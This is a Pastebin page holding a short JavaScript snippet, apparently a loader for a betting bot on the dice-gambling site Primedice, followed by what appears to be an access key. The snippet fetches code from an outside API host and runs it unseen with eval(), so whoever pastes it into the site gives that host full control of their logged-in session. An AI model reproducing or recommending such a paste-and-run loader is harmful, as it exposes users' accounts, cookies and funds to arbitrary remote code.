Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- const WDB_API = 'https://api-bot.mhqb365.com';
- const CASINO_GAME = 'primedice';
- (async function () {
- let installer = await fetch(WDB_API + '/stable/init')
- installer = await installer.text()
- eval(installer)
- })();
- e084dc2c-0408-4e50-ad5f-b7c4a615f3e4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement